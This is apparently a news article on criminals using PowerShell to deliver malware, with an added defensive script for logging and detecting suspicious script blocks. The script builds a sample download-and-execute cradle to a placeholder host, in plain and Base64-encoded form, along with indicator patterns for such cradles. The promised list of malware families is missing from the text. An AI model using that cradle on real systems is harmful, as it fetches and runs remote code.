Microsoft’s PowerShell is Being Abused by Malware Authors


Microsoft PowerShell, the software giant's scripting language and shell, which is now the default shell on Windows, is being used by cybercriminals to deliver malware, security researchers have found.

Security firm Symantec reports that of the PowerShell scripts it analysed, a staggering 95.4 percent were malicious. The figure describes the scripts that reached Symantec's analysis, so it says more about what attackers are sending than about how much legitimate PowerShell use there is. Malware authors are increasingly turning to the scripting language and shell, using its flexibility to fetch and run their payloads, the firm's researchers confirmed.

PowerShell has been around for over a decade and is typically used by system administrators for daily management tasks. Ordinary cybercriminals and larger, well-known groups are now leveraging it too.

As the default shell, PowerShell is an attractive platform for malware authors: it is already installed and trusted on every target. Most organisations are exposed because they have not enabled the extended logging PowerShell offers (script block and module logging), so malicious scripts leave little trace. PowerShell can also run payloads straight from memory, without writing a file to disk for antivirus to scan, and scripts are easy to obfuscate, for example by passing a Base64-encoded command on the command line. Altogether, it is a favoured attack tool for cybercriminals.

Most malicious PowerShell scripts act as downloaders, playing the same role as malicious Office macros: a small first stage that fetches and launches the real payload, according to the cybersecurity firm's researchers.
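The two points above (missing logging, and in-memory downloaders hidden behind encoded command lines) can be checked directly on a Windows host. The following is an added example written for this page, not code from Symantec or the article: it enables script block logging through the same registry value Group Policy sets, decodes any `-EncodedCommand` argument (Base64 of UTF-16LE text), scores script text against a handful of indicator patterns, and applies that to event ID 4104 in the PowerShell Operational log. The indicator list and the sample command lines are constructed for illustration; `example.invalid` is a placeholder host, and the event property index assumes Windows PowerShell 5.x.

```powershell
# Added example (not from the Symantec report or the article): enable PowerShell
# script block logging and triage 4104 events for downloader-style script blocks.
# Indicator names, patterns and sample command lines below are constructed.

function Enable-ScriptBlockLogging {
    # Same key Group Policy writes for "Turn on PowerShell Script Block Logging".
    # Needs an elevated session; applies to Windows PowerShell 5.x.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

# Patterns typical of in-memory download cradles and obfuscated launchers (constructed list).
$Indicators = @(
    @{ Name = 'download-cradle';     Pattern = 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient' }
    @{ Name = 'in-memory-execution'; Pattern = '\bIEX\b|Invoke-Expression' }
    @{ Name = 'base64-decode';       Pattern = 'FromBase64String' }
    @{ Name = 'hidden-window';       Pattern = '-w(indowstyle)?\s+hidden' }
    @{ Name = 'bypass-policy';       Pattern = '-ep\s+bypass|-ExecutionPolicy\s+Bypass' }
)

function Expand-EncodedCommand {
    # Reveal what an "-EncodedCommand <base64>" argument actually runs.
    # PowerShell expects the Base64 of the UTF-16LE command text.
    param([string]$CommandLine)
    $m = [regex]::Match($CommandLine, '-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})', 'IgnoreCase')
    if (-not $m.Success) { return $null }
    try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[2].Value)) }
    catch { return $null }
}

function Test-SuspiciousScriptBlock {
    # Scan the raw text plus its decoded form, so encoding alone does not hide a cradle.
    param([string]$Text)
    $decoded = Expand-EncodedCommand $Text
    $toScan  = if ($decoded) { "$Text`n$decoded" } else { $Text }
    $hits = foreach ($i in $Indicators) { if ($toScan -match $i.Pattern) { $i.Name } }
    [pscustomobject]@{ Suspicious = [bool]$hits; Hits = @($hits); Decoded = $decoded }
}

function Get-SuspiciousScriptBlockEvents {
    # Event ID 4104 ("Creating Scriptblock text"); the script text is the third
    # property of the event, after MessageNumber and MessageTotal.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = $_.Properties[2].Value
            $r = Test-SuspiciousScriptBlock $text
            if ($r.Suspicious) {
                [pscustomobject]@{ Time = $_.TimeCreated; Hits = ($r.Hits -join ','); Text = $text }
            }
        }
}

# Constructed samples: a benign admin one-liner, a macro-style cradle, and the same
# cradle wrapped in -EncodedCommand, the form spam-delivered JavaScript commonly produces.
$benign  = 'Get-Service | Where-Object Status -eq Running | Sort-Object Name'
$inner   = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
$cradle  = "powershell -w hidden -ep bypass -c `"$inner`""
$encoded = 'powershell -NoP -w hidden -enc ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))

foreach ($s in $benign, $cradle, $encoded) {
    $r = Test-SuspiciousScriptBlock $s
    '{0,-5} {1}' -f $r.Suspicious, ($r.Hits -join ',')
}

# On a host you administer: Enable-ScriptBlockLogging, then after some activity
# Get-SuspiciousScriptBlockEvents | Format-Table -AutoSize
```

The benign sample produces no hits; the plain cradle is flagged for the download, in-memory execution, hidden window and policy bypass patterns; the encoded sample is flagged only because the decoded text is scanned as well, which is exactly why looking at the raw `-enc` argument is not enough. Script block logging records the de-obfuscated script as PowerShell compiles it, so once it is enabled the same scan runs over what actually executed rather than over what the command line showed.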

The major malware families Symantec observed using PowerShell are:

All three of the threats above are spread through spam email, and Symantec added:

Over the last six months, we blocked an average of 466,028 emails with malicious JavaScript per day, and this trend is growing. Not all malicious JavaScript files use PowerShell to download files, but we have seen a steady increase in the framework’s usage.

As always, users are advised to update to the latest version of PowerShell, which brings logging and other defences that older versions lack, and to keep security software up to date with the latest patches. Be cautious when opening attachments, especially scripts or files from an untrusted source.

Image credit: Pixabay.